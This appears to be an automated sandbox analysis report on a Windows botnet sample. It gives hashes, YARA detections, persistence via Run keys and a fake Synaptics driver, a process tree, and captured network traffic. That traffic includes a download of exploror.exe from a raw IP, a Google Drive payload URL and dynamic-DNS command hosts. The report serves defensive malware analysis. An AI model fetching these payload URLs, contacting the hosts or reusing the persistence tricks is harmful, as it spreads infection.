Analysis
-
max time kernel
161s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
16/01/2023, 08:32 UTC
Static task
static1
Behavioral task
behavioral1
Sample
1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
Resource
win10v2004-20220812-en
General
-
Target
1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
-
Size
362KB
-
MD5
99be0e637186d469b647525e9275ccfc
-
SHA1
83a797037fd4c10f1248387395cc039aa9f3c71b
-
SHA256
1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180
-
SHA512
1477f8db399c74174379ff881f6dcd9148bf57ff29839c466259d4c17235254e66cfd0410e5d0d79304a1a4f8352910d64a4f1446f7ed9cd5ceccd285ed265d5
-
SSDEEP
3072:N8jSZi34eTzl5KV2GenT0cTtm2LAQSXVqjzpYfJhrI:quZ5eg2GenQ67wk3pyJhrI
Malware Config
Signatures
-
Generic Chinese Botnet
A botnet originating from China which is currently unnamed publicly.
-
Chinese Botnet payload 2 IoCs
resource yara_rule behavioral2/memory/4844-136-0x0000000010000000-0x0000000010018000-memory.dmp unk_chinese_botnet behavioral2/memory/1532-145-0x0000000010000000-0x0000000010018000-memory.dmp unk_chinese_botnet -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 5008 computer.exe 1532 ._cache_computer.exe 3208 Synaptics.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation computer.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" computer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe" 1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Imsossm.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\._cache_computer.exe" ._cache_computer.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: ._cache_computer.exe File opened (read-only) \??\W: ._cache_computer.exe File opened (read-only) \??\Z: ._cache_computer.exe File opened (read-only) \??\F: ._cache_computer.exe File opened (read-only) \??\J: ._cache_computer.exe File opened (read-only) \??\M: ._cache_computer.exe File opened (read-only) \??\S: ._cache_computer.exe File opened (read-only) \??\B: ._cache_computer.exe File opened (read-only) \??\P: ._cache_computer.exe File opened (read-only) \??\Q: ._cache_computer.exe File opened (read-only) \??\R: ._cache_computer.exe File opened (read-only) \??\H: ._cache_computer.exe File opened (read-only) \??\Y: ._cache_computer.exe File opened (read-only) \??\L: ._cache_computer.exe File opened (read-only) \??\N: ._cache_computer.exe File opened (read-only) \??\O: ._cache_computer.exe File opened (read-only) \??\U: ._cache_computer.exe File opened (read-only) \??\E: ._cache_computer.exe File opened (read-only) \??\G: ._cache_computer.exe File opened (read-only) \??\I: ._cache_computer.exe File opened (read-only) \??\K: ._cache_computer.exe File opened (read-only) \??\V: ._cache_computer.exe File opened (read-only) \??\X: ._cache_computer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ._cache_computer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz ._cache_computer.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ computer.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1532 ._cache_computer.exe 1532 ._cache_computer.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4844 wrote to memory of 4644 4844 1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe 79 PID 4844 wrote to memory of 4644 4844 1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe 79 PID 4844 wrote to memory of 4644 4844 1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe 79 PID 4844 wrote to memory of 5008 4844 1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe 83 PID 4844 wrote to memory of 5008 4844 1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe 83 PID 4844 wrote to memory of 5008 4844 1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe 83 PID 5008 wrote to memory of 1532 5008 computer.exe 84 PID 5008 wrote to memory of 1532 5008 computer.exe 84 PID 5008 wrote to memory of 1532 5008 computer.exe 84 PID 5008 wrote to memory of 3208 5008 computer.exe 85 PID 5008 wrote to memory of 3208 5008 computer.exe 85 PID 5008 wrote to memory of 3208 5008 computer.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe"C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md C:\windowss642⤵PID:4644
-
-
C:\windowss64\computer.exe"C:\windowss64\computer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe"C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1532
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
PID:3208
-
-
Network
-
GEThttp://47.93.60.63:8000/exploror.exe1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exeRemote address:47.93.60.63:8000RequestGET /exploror.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 47.93.60.63:8000
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Length: 1181696
Accept-Ranges: bytes
Server: HFS 2.3i
Set-Cookie: HFS_SID_=0.888800468761474; path=/; HttpOnly
Last-Modified: Thu, 03 Nov 2022 07:49:44 GMT
Content-Disposition: attachment; filename="exploror.exe";
-
Remote address:8.8.8.8:53Request164.2.77.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestxred.mooo.comIN AResponse
-
Remote address:8.8.8.8:53Requestfreedns.afraid.orgIN AResponsefreedns.afraid.orgIN A69.42.215.252
-
GEThttp://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978Synaptics.exeRemote address:69.42.215.252:80RequestGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Mon, 16 Jan 2023 08:34:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
-
Remote address:8.8.8.8:53Requestxred.mooo.comIN AResponse
-
Remote address:8.8.8.8:53Requestdocs.google.comIN AResponsedocs.google.comIN A142.250.179.174
-
Remote address:142.250.179.174:443RequestGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Jan 2023 08:35:56 GMT
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-Yj0LQAF4eiOfGvfClVnOlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
Remote address:142.250.179.174:443RequestGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Jan 2023 08:35:56 GMT
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-lHhuxh-tbU6C648SFvIIlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
-
46 B 40 B 1 1
-
40 B 1
-
46 B 40 B 1 1
-
138 B 183 B 3 3
-
138 B 183 B 3 3
-
47.93.60.63:8000http://47.93.60.63:8000/exploror.exehttp1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe72.9kB 1.2MB 1521 1517
HTTP Request
GET http://47.93.60.63:8000/exploror.exeHTTP Response
200 -
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
260 B 5
-
260 B 5
-
260 B 5
-
69.42.215.252:80http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978httpSynaptics.exe430 B 455 B 6 5
HTTP Request
GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978HTTP Response
200 -
260 B 5
-
260 B 5
-
260 B 5
-
920 B 256 B 7 6
-
260 B 5
-
260 B 5
-
260 B 5
-
412 B 172 B 5 4
-
142.250.179.174:443https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtls, httpSynaptics.exe1.5kB 13.8kB 20 18
HTTP Request
GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHTTP Response
404HTTP Request
GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHTTP Response
404 -
208 B 4
-
70 B 144 B 1 1
DNS Request
164.2.77.40.in-addr.arpa
-
59 B 118 B 1 1
DNS Request
xred.mooo.com
-
64 B 80 B 1 1
DNS Request
freedns.afraid.org
DNS Response
69.42.215.252
-
114 B 2
-
59 B 118 B 1 1
DNS Request
xred.mooo.com
-
61 B 77 B 1 1
DNS Request
docs.google.com
DNS Response
142.250.179.174
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
754KB
MD5310a7ff41f6633132e6c2bc25e51e567
SHA15f687df8cc3185ed68d77d0e05502c2eb308c5c8
SHA256d1425edf482717cb64db2a36357866045b0c6306d919296591ffc9bc45d680ab
SHA512ee9b3114cb37e52793bccdf20a27158f5def67ed9c7d8eb772e1deaf5d5f9a0030e847dea40bb320637f29508f1be2a49c3095460a6fd3afbc3bca196f642980
-
Filesize
754KB
MD5310a7ff41f6633132e6c2bc25e51e567
SHA15f687df8cc3185ed68d77d0e05502c2eb308c5c8
SHA256d1425edf482717cb64db2a36357866045b0c6306d919296591ffc9bc45d680ab
SHA512ee9b3114cb37e52793bccdf20a27158f5def67ed9c7d8eb772e1deaf5d5f9a0030e847dea40bb320637f29508f1be2a49c3095460a6fd3afbc3bca196f642980
-
Filesize
400KB
MD520beeb0a82adcce3a58372804acc46be
SHA1c579d9017d2c8298fe075ff5c05963901330e72a
SHA256d1aaa7e7d31bf648c57f0c721d6f6ee2b17395b4e09d9d89a4f6dbd5dd706a8e
SHA5127636912ba6323063cefb7fac5a6cff9e44a474e452a4d5d4f77ef88968266de184c68112e3667585e02e811781f51ee020e61ce820e3f9a38dcfdf30e6d522bd
-
Filesize
400KB
MD520beeb0a82adcce3a58372804acc46be
SHA1c579d9017d2c8298fe075ff5c05963901330e72a
SHA256d1aaa7e7d31bf648c57f0c721d6f6ee2b17395b4e09d9d89a4f6dbd5dd706a8e
SHA5127636912ba6323063cefb7fac5a6cff9e44a474e452a4d5d4f77ef88968266de184c68112e3667585e02e811781f51ee020e61ce820e3f9a38dcfdf30e6d522bd
-
Filesize
1.1MB
MD5be689578752179e22bf915dbcf4f7520
SHA1e798e703bfb90707a2872b51da73f32af566aedb
SHA256de8c1aa37dd523e0699a10be71185f7a8ac1cde972d04107068f49250ef7317e
SHA51289c95b387e566dfaf3f6a4ab60ee6e24d2574dd3802458e4d8f15e4c44136ac54c5b3a53addc1d28748656320050ee735fa2e8e5c57cdfb53fbdddc6eb586da8
-
Filesize
1.1MB
MD5be689578752179e22bf915dbcf4f7520
SHA1e798e703bfb90707a2872b51da73f32af566aedb
SHA256de8c1aa37dd523e0699a10be71185f7a8ac1cde972d04107068f49250ef7317e
SHA51289c95b387e566dfaf3f6a4ab60ee6e24d2574dd3802458e4d8f15e4c44136ac54c5b3a53addc1d28748656320050ee735fa2e8e5c57cdfb53fbdddc6eb586da8